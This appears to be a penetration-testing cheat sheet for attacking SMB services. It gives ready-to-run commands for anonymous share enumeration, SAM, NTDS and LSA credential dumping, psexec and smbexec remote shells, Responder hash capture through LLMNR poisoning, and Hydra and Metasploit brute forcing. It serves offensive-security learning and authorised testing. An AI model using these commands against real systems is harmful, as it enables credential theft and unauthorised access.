139, 445 - SMB

PRIMARY CATEGORY → PROTOCOLS AND SERVICES

Theory

SMB → Server Message Block

Ports

SBM Over NETBIOS

These UDP/TCP Ports use NETBIOS as an intermediate layer between the Transport layer and the Application layer

SMB Version → v1.1 or <

• 137 → NBNS (NetBIOS Name Service) → UDP

IP Addresses resolution to host names

• 138 → Datagrams Transmission → UDP

Non-connection oriented datagram transmission services

• 139 → Connection Oriented SMB Sessions → TCP

SMB Over TCP

SMB Version → 2.X - 3.X and >

• 445 → SMB Direct Over TCP

---

Enumeration

Netexec

Netexec

nxc smb <TARGET>

Null/Anonymous Authentication

Netexec

nxc smb <TARGET> --username '' --password '' # Long Format
nxc smb <TARGET> -u '' -p '' # Short Format

SMBMap

SMBMap

• Local User

smbmap -u '' -p '' -H <TARGET>

• Domain User

smbmap -u '' -p '' -d '<DOMAIN>' <TARGET>

Guest Authentication

Netexec

nxc smb <TARGET> --username 'guest' --password '' # Or -u 'anyrandomuser'

Shared Resources Enumeration

Null Auth

• Netexec

nxc smb <TARGET> --username '' --password '' --shares

• SMBMap

smbmap -u '' -H <TARGET>

• SMBClient

SMBClient

smbclient --user '' --no-pass --list <TARGET>
smbclient -U '' -N -L //<TARGET>

• SMBClient.py (Impacket)

SMBClient.py

smbclient.py -no-pass '<DOMAIN/WORKGROUP>@<TARGET>'

Guest Auth

• Netexec

nxc smb <TARGET> --username 'guest' --password '' --shares

• SMBMap

smbmap -u 'guest' -p '' -H <TARGET>

• SMBClient

smbclient --user 'guest%' --list active.htb

• SMBClient.py (Impacket)

smbclient.py -no-pass '<DOMAIN/WORKGROUP>/guest@<TARGET>'

User Account Authentication

• Netexec

nxc smb <TARGET> --username '<USER>' --password '<PASSWORD>' --shares

• SMBMap

smbmap -u '<USER>' -p '<PASSWORD>' -H <TARGET>

• SMBClient

smbclient --user '<USER>%<PASSWORD>' '//<TARGET>/<RESOURCE>'
smbclient --user '<DOMAIN/WORKGROUP>\<USER>%<PASSWORD>' '//<TARGET>/<RESOURCE>'

• SMBClient.py (Impacket)

smbclient.py -no-pass '<DOMAIN/WORKGROUP>/<USER>@<TARGET>'

Recursively Enumeration

• Netexec

nxc smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --spider '<SHARE>' --regex .

• SMBMap

smbmap -H <TARGET> -u '' -p '' -R # All Shared Resources
smbmap -H <TARGET> -u '' -p '' -R --depth <INTEGER> # All Shared Resources limited to X depth
smbmap -H <TARGET> -u '' -p '' -r '<SHARED_RESOURCE>' # A Specific Shared Resource

Download a Resource

• Netexec

nxc smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --share '<SHARE>' --get-file '<REMOTE_RESOURCE>' '<LOCAL_RESOURCE>'

Upload a Resource

• Netexec

nxc smb '<TARGET>' --username '<USER>' --password '<PASSWD>' --share '<SHARE>' --put-file '<LOCAL_RESOURCE>' '<REMOTE_RESOURCE>'

Recursive Download

• SMBClient

smbclient --user '' --no-pass //<TARGET>/<RESOURCE_PATH>

> mask ""
> recurse on
> prompt off
> mget *

User Enumeration

Need Domain Account Valid Credentials

NetExec

nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --users

Logged-on Users Enumeration

Netexec

nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --loggedon-users

Password Policy Enumeration

Netexec

nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --pass-pol

Net

From Windows

net accounts

---

Mount a Shared SMB Folder

Mount

No Auth

Null Session or Guest Authentication

mount --types cifs --options //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH> 

• Read Only

mount --types cifs --options ro //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>

Auth Required

NTLM

mount --types cifs --options username=<USER>,password=<PASSWORD> //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>

• Read Only

mount --types cifs --options ro,username=<USER>,password=<PASSWORD> //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>

Kerberos

kinit '<PRINCIPAL>@<DOMAIN>'
kvno '<CIFS_SPN>'

e.g.

kinit john.doe@DOMAIN.INTERNAL
kvno cifs/DC.DOMAIN.INTERNAL # Or cifs/DC

mount --type cifs --options 'sec=krb5,vers=3.0,ip=<DC_IP>,cruid=0' '//<DC_FQDN>/<SHARE>' '<LOCAL_PATH>'

e.g.

env KRB5CCNAME=FILE:/tmp/krb5cc_0 mount --type cifs --options 'sec=krb5,vers=3.0,ip=10.10.10.15,cruid=0' '//dc.domain.internal/smbFolder' '/mnt/smbFolder'

---

Sensitive Data Dump

Privileged Account Credentials are required

Dump SAM Credentials

nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --sam

Dump NTDS Credentials

nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --ntds

Dump LSA Secrets

nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --lsa

+ Info

• 
  • SMB - CREDENTIAL DUMP

---

Remote Connection

PSExec

PSExec.py (Impacket)

PSExec.py

psexec.py '<DOMAIN>/<USERNAME>:<PASSWORD>@<HOSTNAME>'

PSExec64.exe (Sysinternals)

PSExec64.exe

psexec64.exe -i -a <COMMAND> # e.g. cmd.exe || powershell.exe

SMBExec.py

SMBExec.py

smbexec.py '<DOMAIN>/<USERNAME>:<PASSWORD>@<HOSTNAME>'

+ Info

• 
  • SMB - REMOTE ACCESS

---

Lateral Movement

• 
  • SMB - PASS THE HASH
• 
  • SMB - PASS THE TICKET

---

Authentication Coercion

• 
  • MS-RPRN ABUSE
• 
  • MS-EFSR ABUSE

---

MitM and Credential Cracking

By default, when a user logs in to a Windows Machine, whether it is domain-joined or not, any process run under that user is associated with an Access Token, which is, in turn, related to a Logon Session through an specific attribute

If the user login to the system Interactively (2) or Remotelye Interactively (10), its credentials are automatically tied to the Logon Session generated, and cached

The latter thing does not happen when we are talking about Network Authentication

To prevent the user from having to put repeteadly its credentials each time he asks for a network resource, which implies an authentication, Windows introduced SSO (Single Sign On

Because of this behaviour, if an attacker forces or coerces a Windows Machine to connect to a controlled SMB Server, which requires authentication, the victim will authenticate to the rogue server and then the credentials of that user will be grabbed

Likewise, a user, which is logged in to a Windows Machine, could misstype a single character on the hostname when introducing a UNC at the File Explorer, therefore indicanting an incorrect hostname

Then, the SMB Client would perform a DNS Query to its Primary DNS Server, which, in a domain-joined computer, is usually de DC, requesting for the Canonical Name and Address related to that hostname

Since the give hostname does not exist, the DNS Server will respond that there is no registry for the supplied name

At this point, the Windows Machine will use the following Multicast Name Resolution Protocols as a fallback →

• mDNS → Multicast Domain Name System
• LLMNR → Local Link Multicast Name Resolution
• NBT-NS → NetBios Name Service

As its name suggests, those protocols are multicast, so the client’s name resolution query is sent to all the hosts within the Multicast Range

If an attacker is listenting for those queries using a poisoning LLMNR, NBTNS and MDNS tool such as responder, which sets up an SMB Server, among any other things, he could respond to the victim indicating that the supplied hostname resolves to the Address of the attacker itself

So first, the SMB Client would negotiate with the rogue SMB Server the Protocol Version and Authentication Mechanisms, and then the victim would authenticate to SMB Server

At this point, the attacker would receive a Net-NTLMv2 Response, from which several actions can be carried out →

• 
  • NTLM RELAY OVER SMB
• 
  • CRACKING NET-NTLMV2

Responder

Responder

Responder.py --interface <INTERFACE>

---

Bruteforcing & Password Spraying

Netexec

Reference

Local Accounts

nxc smb <HOSTNAME> --username <USER OR USERLIST> --password <PASSWD OR PASSWDLIST> --domain . --local-auth

Domain Accounts

nxc smb <HOSTNAME> --username <USER OR USERLIST> --password <PASSWD OR PASSWDLIST> --domain <DOMAIN>

Hydra

Reference    •    Hydra SMB2 Support

Compile from Source

• Repository Cloning and Installation of Deps

git clone https://github.com/vanhauser-thc/thc-hydra Hydra

cd !$ && ./configure

apt install -y -- libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libmemcached-dev libgpg-error-dev libgcrypt11-dev libgcrypt20-dev

apt install -y -- libsmbclient-dev

• Compilation and Installation of the Binary on the System

Before proceed with the compilation, check the ./configure’s output

make && sudo make install

• Run Hydra with SMB2 as follows →

Bruteforcing

• One User ↔ Passwordlist

hydra -v -T <THREADS> -l <USERNAME> -P <PASSWDLIST> <TARGET> smb2

• Userlist → Passwordlist

hydra -v -T <THREADS> -L <USERLIST> -P <PASSWORDLIST> <TARGET> smb2

Password Spraying

hydra -v -T <THREADS> -L <USERLIST> -p <PASSWORD> <TARGET> smb2

Metasploit

SMB_Login

msfconsole -q

> use auxiliary/scanner/smb/smb_login
> set user_file <USERLIST>
> set pass_file <PASSWDLIST>
> set rhosts <TARGET>
> run

---

Resources

Guest vs Null Session on Windows